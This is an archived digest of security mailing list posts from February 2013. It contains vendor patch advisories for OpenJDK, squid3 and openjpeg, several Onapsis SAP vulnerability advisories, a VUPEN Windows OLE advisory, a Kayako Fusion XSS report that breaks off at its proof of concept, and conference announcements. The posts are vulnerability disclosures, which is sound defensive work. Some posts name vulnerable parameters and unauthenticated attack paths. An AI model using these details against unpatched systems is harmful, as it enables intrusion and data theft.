[ MDVSA-2013:014 ] java-1.6.0-openjdk

2013-02-25 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2013:014
 http://www.mandriva.com/security/
 ___

 Package : java-1.6.0-openjdk
 Date: February 22, 2013
 Affected: 2011., Enterprise Server 5.0
 ___

 Problem Description:

 Multiple security issues were identified and fixed in OpenJDK
 (icedtea6):
 
  * S8006446: Restrict MBeanServer access
  * S8006777: Improve TLS handling of invalid messages
  * S8007688: Blacklist known bad certificate
  * S7123519: problems with certification path
  * S8007393: Possible race condition after JDK-6664509
  * S8007611: logging behavior in applet changed
 
 The updated packages provide icedtea6-1.11.8, which is not vulnerable
 to these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1486
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1487
 http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-February/021998.html
 http://www.oracle.com/technetwork/topics/security/javacpufeb2013update-1905892.html
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com

[SECURITY] [DSA 2631-1] squid3 security update

2013-02-25 Thread Salvatore Bonaccorso

- -
Debian Security Advisory DSA-2630-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
February 24, 2013  http://www.debian.org/security/faq
- -

Package: squid3
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-5643 CVE-2013-0189
Debian Bug : 696187

Squid3, a fully featured Web proxy cache, is prone to a denial of
service attack due to memory consumption caused by memory leaks in
cachemgr.cgi:

CVE-2012-5643

squid's cachemgr.cgi was vulnerable to excessive resource use. A
remote attacker could exploit this flaw to perform a denial of
service attack on the server and other hosted services.

CVE-2013-0189

The original patch for CVE-2012-5643 was incomplete. A remote
attacker still could exploit this flaw to perform a denial of
service attack.

For the stable distribution (squeeze), these problems have been fixed in
version 3.1.6-1.2+squeeze3.

For the testing distribution (wheezy), these problems have been fixed in
version 3.1.20-2.1.

For the unstable distribution (sid), these problems have been fixed in
version 3.1.20-2.1.

We recommend that you upgrade your squid3 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org





NoSuchCon CFP 2.0 / 15-17 May 2013 / Paris, France

2013-02-25 Thread Jonathan Brossard
***

PARENTAL ADVISORY: 100% technical content
***



  +--+
  =  =
  = NoSuchCon - CFP 2.0  =
  =  =
  =** http://www.nosuchcon.org/#cfp **   =
  =  =
  =  15-17 May 2013 / Paris / France =
  =  =
  °--°

 -- + --

   The US have the NSA, hackers have the NSC.



--[ Synopsis:

The first edition of the NoSuchCon conference will take place in Paris
from May the 15th to May the 17th of 2013.

NSC is the badass hardcore technical security conference. Of death.


--[ Background:

We think hacking is a science, not an art. It's largely the science of
experimentation and self learning. Best effort is not enough anymore. The
number of hackers reaching the level where they can actually discover things
by themselves has never been so high. And at the same time, the signal-to-noise
ratio in our traditional communication channels (IRC, mailing lists,
conferences, informal gatherings...) has never been so low.

So we thought we might give it a shot: we're trying to build a 0% bullsh!t
conference. It's tougher than one might expect, but with the help of many
(see in particular the support from our hardcore Programming Committee of
death), we are confident that passion will prevail and that we'll eventually
learn something from each other :)

If you're tired of people making money on your back by monetizing your research
whenever you go to a conference, we have good news: we're 100% non-profit.
We're also not affiliated with any .gov or .com or any other organization.
We work hard at night. Our aim is to learn stuff. If this
sounds a lot like your own life, we'd be happy to have you among us.

It's also worth remembering that hacking is *not* a competition. As such,
there is no winner or rockstar. All you'll find here is people experimenting
and seeking truth in code and RFCs.

Finally, we'd like to insist on respect. Respect among attendees of course,
which goes without saying (we all share the same passion; let's not get
into ego problems and instead let's learn from each other. You know deep inside
yourself that even though *you* certainly did your part of hard work, there
would be no computers or network without the help of many), but also for
researchers who come over, often from very far away, to present months of late
night work to their peers. This is why NSC is strictly single track: every talk
that makes it in deserves to be attended to, and everyone deserves to be
treated with equal esteem and respect. There's no such thing as a rockstar at
NSC: if you're after fame and profit, we're sure you'll find many other places
to go to these days.


--[ Press people / Media / Media Analysts / Bloggers:

NSC is not a top secret conference. You are welcome to come over and
participate. NSC staff will do their best to make your job easier.
Please, bear in mind that you'll have to comply with strict hacker ethics,
particularly in terms of privacy, personality rights and respect the anonymity
of people who do not want to appear in your publications: you cannot take
pictures of people without their *prior* consent, and people do not *have to*
answer to any question if they don't feel like it.


--[ Venue:

The NSC conference will be hosted in the French Communist Party's amazing
headquarters. This astonishing building was designed by the recently deceased
Brazilian architect Oscar Niemeyer.

The address is:
Espace Oscar Niemeyer - Siege du Parti Communiste
2 Place Colonel Fabien, 75019 Paris, France


--[ Tickets/Pricing:

Tickets will be available for sales within days via our main website.

l33t sponsor ticket  1337 EUR
Evil sponsor ticket   666 EUR
Regular entrance ticket   300 EUR
Regular online ticket 250 EUR
Early bid ticket 2200 EUR  before 2013/04/30
Early bid ticket  150 EUR  before 2013/04/01
Student ticket 50 EUR  (50 tickets available)


--[ Quality:

The aim of NSC is best summarized in 3 words: quality, quality and research.
That, and hard work !

We believe that there is a place for quality independent security research
disclosure. We think that this place should be run on a non-profit basis.
We do our best to ensure that the chosen talks are of the utmost quality
thanks to the highly respected security researchers who form our selection
panel.

As a result, we hope to deliver in a 3 days 

[SE-2012-01] New security issues affecting Oracle's Java SE 7u15

2013-02-25 Thread Security Explorations


Hello All,

We had yet another look into Oracle's Java SE 7 software that
was released by the company on Feb 19, 2013. As a result, we
have discovered two new security issues (numbered 54 and 55),
which when combined together can be successfully used to gain
a complete Java security sandbox bypass in the environment of
Java SE 7 Update 15 (1.7.0_15-b03).

Following our Disclosure Policy [1], we provided Oracle with
a brief technical description of the issues found along with
a working Proof of Concept code that illustrates their impact.

Both new issues are specific to Java SE 7 only. They allow to
abuse the Reflection API in a particularly interesting way.

Without going into further details, everything indicates that
a ball is in Oracle's court. Again.

Thank you.

Best Regards
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
We bring security research to the new level
-

References:
[1] Security Explorations - Disclosure Policy
http://www.security-explorations.com/en/disclosure-policy.html



DC4420 - London DEFCON Tuesday 26th Feb 2013

2013-02-25 Thread Major Malfunction

Apologies for the late announcement...

Tomorrow we have a particularly excellent line-up!

Primary Speaker:

Arron Finnon - Finux Tech Weekly

Title:

The OSNIF Project: NIDS/NIPS Testing and Auditing

Synopsis:

Yeah great, I know it's not a silver bullet! NIPS/NIDS have issues, and
that's putting it lightly. I've talked about their limitations for
awhile, and I get either that's awesome or they've been done to
death. The truth is, we achieved nothing in fixing the problem. We can
moan about how rubbish they are, we can pretend it's not our problem, or
we can start to address the situation. For too long we've moaned, we've
made comments and done little to make them better. Vendors are making
money off products we all know could be doing a better job. Here's a
crazy idea, let's talk about the issues, why they suck, and this time
actually do something! What is to be lost by trying something new? Let's
accept they fail and instead, turn that frown upside down. This talk
isn't an answer, it's a beginning. Looking at some of the common and
uncommon issues faced in trying to make NIDS/NIPS better, and why we
fail at finding solutions. I don't have all the answers, however I
intend to answer one simple question; What is OSNIF?

I intend to look at the current situation surrounding testing and
assessing NIDS/NIPS and basically why it sucks.  I'll also discuss the
Open Source Network Intrusion Framework (OSNIF) project, which is an open
group set up by people involved within IDS/IPS to put together a testing
methodology for IPS/IDS.  Sort of OWASP but for NIDS/NIPS.

~~

Secondary Speaker:

Adrian Hayter - Convergent Network Solutions

Title:

The dangers of black box devices. Or...just how many insecure IP 
cameras are out there?


Synopsis:

Last year a security vulnerability left hundreds of TRENDnet IP camera 
feeds exposed on the Internet, many of them broadcasting their owner's 
living rooms, or (even more disturbingly) children sleeping.  One year 
on, and despite assurances from TRENDnet, a large number of feeds are 
still accessible. Over the last several months, I've hunted down the 
feeds of numerous types of camera and slowly built up an online viewer 
to illustrate the problem that these black box devices pose to 
uneducated users. This talk will give an overview of the processes 
involved in creating the viewer, as well as showcasing some of the more 
bizarre & interesting feeds that are still broadcasting to this day.


Venue is here:

  http://www.phoenixcavendishsquare.co.uk/

Full details:

  http://www.dc4420.org/

See you there!

cheers,
MM
--
In DEFCON, we have no names... errr... well, we do... but silly ones...


VUPEN Security Research - Microsoft Windows OLE Automation Code Execution Vulnerability

2013-02-25 Thread VUPEN Security Research
VUPEN Security Research - Microsoft Windows OLE Automation Remote Code
Execution Vulnerability

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
-

Microsoft Windows is a series of software operating systems and graphical
user interfaces produced by Microsoft. Windows had approximately 90% of
the market share of the client operating systems. (Wikipedia)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Windows.

The vulnerability is caused by an integer overflow error in the
SysAllocStringLen() function within the Oleaut32.dll (Object Linking
and Embedding Automation) library, which could allow remote attackers
to execute arbitrary code via a specially crafted web page or Office
document.

CVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


III. AFFECTED PRODUCTS
---

Microsoft Windows XP Service Pack 3


IV. Binary Analysis & Exploits/PoCs
---

In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit are available through the VUPEN BAE
(Binary Analysis & Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.

The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.


V. VUPEN Threat Protection Program
---

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION


Apply MS13-020 security updates.


VII. CREDIT
--

This vulnerability was discovered by Nicolas Joly of VUPEN Security


VIII. ABOUT VUPEN Security
---

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.

VUPEN has been recognized as Company of the Year 2011 in the Vulnerability
Research Market by Frost & Sullivan.

VUPEN solutions include:

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php


IX. REFERENCES
--

http://technet.microsoft.com/en-us/security/bulletin/ms13-020
http://www.vupen.com/english/research.php


X. DISCLOSURE TIMELINE
-

2010-08-05 - Vulnerability Discovered by VUPEN and shared with customers
2013-02-12 - MS13-020 security bulletin released
2013-02-20 - Public disclosure



[SECURITY] [DSA 2629-1] openjpeg security update

2013-02-25 Thread Michael Gilbert

- -
Debian Security Advisory DSA-2629-1   secur...@debian.org
http://www.debian.org/security/   Michael Gilbert
February 25, 2013  http://www.debian.org/security/faq
- -

Package: openjpeg
Vulnerability  : several issues
Problem type   : local (remote)
Debian-specific: no
CVE ID : CVE-2009-5030 CVE-2012-3358 CVE-2012-3535
Debian Bug : 672455 681075 685970

CVE-2009-5030

   Heap memory corruption leading to invalid free when processing certain 
   Gray16 TIFF images.

CVE-2012-3358

   Huzaifa Sidhpurwala of the Red Hat Security Response Team found a 
   heap-based buffer overflow in JPEG2000 image parsing.

CVE-2012-3535

   Huzaifa Sidhpurwala of the Red Hat Security Response Team found a 
   heap-based buffer overflow when decoding JPEG2000 images.

For the stable distribution (squeeze), these problems have been fixed in
version 1.3+dfsg-4+squeeze1.

For the testing (wheezy) and unstable (sid) distributions, these problems
have been fixed in version 1.3+dfsg-4.6.

We recommend that you upgrade your openjpeg packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Onapsis Security Advisory 2013-001] SAP Portal PDC Information Disclosure

2013-02-25 Thread Onapsis Research Labs
Onapsis Security Advisory 2013-001:  SAP Portal PDC Information Disclosure

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on
upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's
users through weaknesses in the SAP system.

Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through the
exploitation of vulnerabilities in their systems.


 Risk Level:  Medium

2. Advisory Information
===

-- Public Release Date: 2013-02-21

-- Subscriber Notification Date: 2013-02-21

-- Last Revised: 2013-02-21

-- Security Advisory ID: ONAPSIS-2013-001

-- Onapsis SVS ID: N/A

-- Researcher: Mariano Nunez

-- Initial Base CVSS v2:  4.0 (AV:N/AC:L/AU:S/C:P/I:N/A:N)


3. Vulnerability Information


-- Vendor: SAP

-- Affected Components:

   * SAP Enterprise Portal
   (Check SAP Note 1658947 for detailed information on affected releases)

-- Vulnerability Class: Information Disclosure

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-001


4. Affected Components Description
==

SAP® Enterprise Portal (SAP® EP) unifies enterprise applications, information, and services from SAP and non-SAP sources
into one system to support business processes, both within and across company boundaries. SAP Enterprise Portal is a
building block of SAP NetWeaver™ – a total integration and application platform designed to unify and align people,
information, and business processes across technologies and organizations. [1]


[1] SAP BWP Portal Infrastructure

5. Vulnerability Details


The SAP Portal “Federation” configuration pages do not properly handle authentication, exposing the entire Portal
infrastructure.

Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to
affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution
===

SAP has released SAP Note 1658947, which provides patched versions of the affected components.
The patches can be downloaded from https://service.sap.com/sap/support/notes/1658947.

Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected
components in order to reduce business risks.


7. Report Timeline
==

2011-11-16: Onapsis provides vulnerability information to SAP.
2012-03-13: SAP releases security patches.
2013-02-21: Onapsis notifies availability of security advisory to security mailing lists.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of business critical systems and applications.

With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the
company. The experts involved in this special team lead the public research trends in this matter, having discovered and
published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and
Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the general security and professional
community, encouraging the sharing of information and increasing the common knowledge in this field.

About Onapsis
=

Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through
different innovative products and services, Onapsis helps its global customers to effectively increase the security
level of their core business platforms, protecting their information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in
the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and
governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated Security & Compliance Audits, Vulnerability
Assessments and Penetration Tests over their SAP platform, helping them enforce compliance

[Onapsis Security Advisory 2013-002] SAP SDM Denial of Service

2013-02-25 Thread Onapsis Research Labs
Onapsis Security Advisory 2013-002: SAP SDM Denial of Service

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on
upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=
By exploiting this vulnerability, an attacker would be able to perform a sabotage attack over the service used to deploy
and change software components in the SAP AS Java.

This would prevent legitimate developers and administrators from performing and maintaining required business and technical
activities.

 Risk Level: Medium

2. Advisory Information
===

-- Public Release Date: 2013-02-21

-- Subscriber Notification Date: 2013-02-21

-- Last Revised: 2013-02-21

-- Security Advisory ID: ONAPSIS-2013-002

-- Onapsis SVS ID: ONAPSIS-00042

-- Researcher: Mariano Nunez / Jordan Santarsieri

-- Initial Base CVSS v2:  5.0 (AV:N/AC:L/AU:N/C:N/I:N/A:P)

3. Vulnerability Information


-- Vendor: SAP

-- Affected Components:

   * SAP J2EE SDM
(Check SAP Note 1586419 for detailed information on affected releases)

-- Vulnerability Class: Denial of Service

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-002

4. Affected Components Description
==

The Software Deployment Manager (SDM) is the standard tool that you use to install J2EE components on the SAP J2EE
Engine. The SDM is a client/server application. The SDM Server runs on the SAP J2EE Engine side. This server is started
automatically with the J2EE Engine. A graphical user interface is available as a client. [1]

[1] http://help.sap.com/saphelp_nw04/helpdata/en/63/2c4f65a54c4a4db1a3600397ae617f/content.htm

5. Vulnerability Details


The SDM suffers from a design vulnerability, in the way it handles failed user authentication attempts, generating a
Denial of Service condition if some conditions are met.  This can be abused by a malicious attacker to disrupt this service.

Additional technical details about this issue are not disclosed at this moment with the purpose of providing enough time
to affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution
===

SAP has released SAP Note 1586419, which provides patched versions of the affected components.
The patches can be downloaded from https://service.sap.com/sap/support/notes/1586419.

Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected
components in order to reduce business risks.


7. Report Timeline
==

2011-01-24: Onapsis provides vulnerability information to SAP.
2011-08-09: SAP releases security patches.
2013-02-21: Onapsis notifies availability of security advisory to security mailing lists.



[Onapsis Security Advisory 2013-003] SAP Enterprise Portal Cross-Site-Scripting

2013-02-25 Thread Onapsis Research Labs
Onapsis Security Advisory 2013-003: SAP Enterprise Portal Cross-Site-Scripting

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on
upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's
users through weaknesses in the SAP system.

Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through complex
social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them.

 Risk Level: Medium

2. Advisory Information
===

-- Public Release Date: 2013-02-21

-- Subscriber Notification Date: 2013-02-21

-- Last Revised: 2013-02-21

-- Security Advisory ID: ONAPSIS-2013-003

-- Onapsis SVS ID: ONAPSIS-00044

-- Researcher: Jordan Santarsieri

-- Initial Base CVSS v2:  4.3 (AV:N/AC:M/AU:N/C:N/I:P/A:N)

3. Vulnerability Information


-- Vendor: SAP

-- Affected Components:

   * SAP Enterprise Portal
   (Check SAP Note 1589716 for detailed information on affected releases)

-- Vulnerability Class: Cross-Site-Scripting

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-003

4. Affected Components Description
==

SAP® Enterprise Portal (SAP® EP) unifies enterprise applications, information, and services from SAP and non-SAP sources
into one system to support business processes, both within and across company boundaries. SAP Enterprise Portal is a
building block of SAP NetWeaver™ – a total integration and application platform designed to unify and align people,
information, and business processes across technologies and organizations. [1]

[1] SAP BWP Portal Infrastructure

5. Vulnerability Details


As the server does not perform a proper security validation on the input parameters, it is possible to inject DHTML code
that would be rendered to the user accessing the link.

Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to
affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution
===

SAP has released SAP Note 1589716 which provides patched versions of the 
affected components.
The patches can be downloaded from 
https://service.sap.com/sap/support/notes/1589716.

Onapsis strongly recommends SAP customers to download the related security 
fixes and apply them to the affected
components in order to reduce business risks.


7. Report Timeline
==

2011-03-09: Onapsis provides vulnerability information to SAP.
2011-11-08: SAP releases security patches.
2013-02-21: Onapsis notifies availability of security advisory to security 
mailing lists.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
business critical systems and applications.

With that objective in mind, a special unit - the Onapsis Research Labs - has 
been developed since the creation of the
company. The experts involved in this special team lead the public research 
trends in this matter, having discovered and
published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and
Development teams, improving the quality of our solutions and enabling our 
customers to be protected from the latest
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional
community, encouraging the sharing of information and increasing the common 
knowledge in this field.

About Onapsis
=

Onapsis is the leading provider of solutions for the security of ERP systems 
and business-critical applications. Through
different innovative products and services, Onapsis helps its global customers 
to effectively increase the security
level of their core business platforms, protecting their information and 
decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the SAP security 
field, with several years of experience in
the assessment and protection of critical platforms in world-wide customers, 
such as Fortune-100 companies and
governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated 
Security  

[Onapsis Security Advisory 2013-004] SAP J2EE Core Service Arbitrary File Access

2013-02-25 Thread Onapsis Research Labs
Onapsis Security Advisory 2013-004: SAP J2EE Core Service Arbitrary File Access

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on
upcoming advisories, presentations and new research projects from the Onapsis 
Research Labs, as well as exclusive access
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access or modify all the business
information processed by the ERP system.

This would result in the total compromise of the SAP infrastructure.

 Risk Level: Critical

2. Advisory Information
===

-- Public Release Date: 2013-02-21

-- Subscriber Notification Date: 2013-02-21

-- Last Revised: 2013-02-21

-- Security Advisory ID: ONAPSIS-2013-004

-- Onapsis SVS ID: ONAPSIS-00057

-- Researcher: Juan Perez-Etchegoyen

-- Initial Base CVSS v2:  10 (AV:N/AC:L/AU:N/C:C/I:C/A:C)

3. Vulnerability Information


-- Vendor: SAP

-- Affected Components:

   * SAP J2EE Engine Core Services
   (Check SAP Note 1682613 for detailed information on affected releases)

-- Vulnerability Class: Arbitrary File Read/Write

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-004


4. Affected Components Description
==

SAP’s NetWeaver combines Java technologies with proven SAP programming models 
and technologies. With the Web Application
Server, SAP offers a runtime environment for Web applications that can be 
written both in ABAP and in Java. A fully
J2EE-compliant server has been integrated with the traditional SAP Web 
Application Server, providing fast connectivity
between applications written in Java and ABAP[1].

[1] 
http://help.sap.com/saphelp_nw04/helpdata/en/e4/ece561ee654d3980df19b53a48cc1b/content.htm

5. Vulnerability Details


The J2EE core services are a set of features exposed through different 
protocols. One of these services lacks the
proper authentication and authorization features, allowing a remote 
unauthenticated attacker to read and write any file,
depending on the permissions of the SIDADM user.

Technical details about this issue are not disclosed at this moment with the 
purpose of providing enough time to
affected customers to patch their systems and protect against the exploitation 
of the described vulnerability.


6. Solution
===

SAP has released SAP Note 1682613 which provides patched versions of the 
affected components.
The patches can be downloaded from 
https://service.sap.com/sap/support/notes/1682613.

Onapsis strongly recommends SAP customers to download the related security 
fixes and apply them to the affected
components in order to reduce business risks.


7. Report Timeline
==

2012-07-30: Onapsis provides vulnerability information to SAP A.G.
2012-07-31: SAP confirms reception of vulnerability submission.
2012-11-13: SAP releases security patches.
2013-02-21: Onapsis notifies availability of security advisory to security 
mailing lists.


[Onapsis Security Advisory 2013-006] SAP SMD Agent Code Injection

2013-02-25 Thread Onapsis Research Labs
Onapsis Security Advisory 2013-006: SAP SMD Agent Code Injection

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on
upcoming advisories, presentations and new research projects from the Onapsis 
Research Labs, as well as exclusive access
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access or modify all the business
information processed by the ERP system.

This would result in the total compromise of the SAP infrastructure.

 Risk Level: High

2. Advisory Information
===

-- Public Release Date: 2013-02-21

-- Subscriber Notification Date: 2013-02-21

-- Last Revised: 2013-02-21

-- Security Advisory ID: ONAPSIS-2013-006

-- Onapsis SVS ID: N/A

-- Researcher: Juan Perez-Etchegoyen

-- Initial Base CVSS v2:  7.5 (AV:N/AC:L/AU:N/C:P/I:P/A:P)


3. Vulnerability Information


-- Vendor: SAP

-- Affected Components:

   * SAP Solution Manager Diagnostics Agent
   (Check SAP Note 1774568 for detailed information on affected releases)

-- Vulnerability Class: Abuse of Functionality

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-006


4. Affected Components Description
==

According to the vendor, “The diagnostics agent is a central component of the 
SAP Solution Manager system landscape” [1].

[1] http://wiki.sdn.sap.com/wiki/display/SMSETUP/Diagnostics+Agents


5. Vulnerability Details


The SMD agent provides an interface listening and processing the P4 protocol, 
which is a proprietary SAP protocol. Using
this interface it is possible to:

   * Retrieve technical information such as versions and configurations.
   * Configure an installed application.
   * Install/remove applications.

By abusing this default unauthenticated interface, a remote attacker would be 
able to install an arbitrary application,
achieving full compromise of the SMD agent and the SAP instances installed on 
the server.

Technical details about this issue are not disclosed at this moment with the 
purpose of providing enough time to
affected customers to patch their systems and protect against the exploitation 
of the described vulnerability.


6. Solution
===

SAP has released SAP Note 1774568 which provides patched versions of the 
affected components.
The patches can be downloaded from 
https://service.sap.com/sap/support/notes/1774568.

Onapsis strongly recommends SAP customers to download the related security 
fixes and apply them to the affected
components in order to reduce business risks.


7. Report Timeline
==

2012-04-17: SAP confirms having the information of vulnerability.
2012-11-13: SAP releases security patches.
2013-02-21: Onapsis notifies availability of security advisory to security 
mailing lists.



Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities

2013-02-25 Thread Vulnerability Lab
Title:
==
Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities


Date:
=
2013-01-22


References:
===
http://www.vulnerability-lab.com/get_content.php?id=824

ID:   SWIFT-3119
URL: http://dev.kayako.com/browse/SWIFT-3119


VL-ID:
=
824


Common Vulnerability Scoring System:

4.1


Introduction:
=
Kayako Fusion is the world's leading multi-channel helpdesk solution that 
enables organizations to deliver a 
better customer experience and work more effectively as a team, whatever their 
size. Whether over email, support 
tickets, self-help, live chat or voice, your customers' support history is 
tracked in one place and can be 
accessed from anywhere. Proven, powerful and accessible support tools without 
the expense or rocket science.

(Copy of the Vendor Homepage: http://www.kayako.com/products/fusion/ )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple persistent web 
vulnerabilities in the Kayako Fusion v4.51.1891 Application.


Report-Timeline:

2013-01-04: Researcher Notification & Coordination
2013-01-22: Public Disclosure


Status:

Published


Affected Products:
==
Kayako
Product: Fusion - CMS 4.51.1891


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the Kayako 
Fusion v4.51.1891 Web Application.
The vulnerability type allows an attacker to inject own malicious script code 
in the vulnerable module on application side (persistent).

The first vulnerability is located in the Tickets section when processing to 
request via the `Escalation` module the bound 
vulnerable add_tags & remove_tags application parameters. The persistent 
injected script code will be executed directly out of 
the `add` section when processing to edit the earlier inserted dbms context.

The second vulnerability is located in the Base section when processing to 
request via the `Manage` module the bound vulnerable 
`CustomFieldGroup & eMail` application listing. The persistent injected script 
code will be executed directly out of the `usergroup` 
listing when processing to manage the earlier inserted dbms context.

The third vulnerability is located in the Live-Chat section when processing to 
request via the `Manage` module the bound vulnerable 
`Visitor Group Title` application listing. The persistent injected script code 
will be executed directly out of the `Visitor Group` 
listing when processing to manage the earlier inserted dbms context.

The 4th vulnerability is located in the LanguagePhrase section when processing 
to request via the `Manage` module the bound vulnerable 
`search query` (string) application listing. The persistent injected script 
code will be executed directly out of the `Search Query` 
listing when processing to manage the earlier inserted dbms context.

The 5th vulnerability is located in the Staff section when processing to 
request via the `Manage or Insert` module the bound vulnerable 
`staff name or staff group` application parameters. The persistent injected 
script code will be executed directly out of the `Staff`- or 
`Staff Edit` listing when processing to manage the earlier inserted dbms 
context.

The vulnerabilities can be exploited with a privileged application user account 
and low or medium required user interaction. 
Successful exploitation of the vulnerability results in persistent session 
hijacking, persistent phishing, external redirect, external malware 
loads and persistent vulnerable module context manipulation.

Vulnerable Section(s):
[+] Tickets
[+] Base
[+] Live-Chat
[+] LanguagePhrase
[+] Staff

Vulnerable Module(s):
[+] Escalation/Insert - (Tickets)
[+] CustomFieldGroup/Manage - (Base)
[+] Staff/Insert & /Staff/Edit/1 - (Base)
[+] StaffGroup/Insert - (Base)
[+] LiveChat/Group/Manage - (Live-Chat)
[+] Manage/0 - Search  - (LanguagePhrase)

Vulnerable Parameter(s):
[+] Add tags & remove tags
[+] eMail User - Listing (Profile All Sections)
[+] Visitor Group Title & Group Color
[+] Search Query


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by restricted 
low or medium privileged application user account with low 
required user interaction. For demonstration or reproduce ...


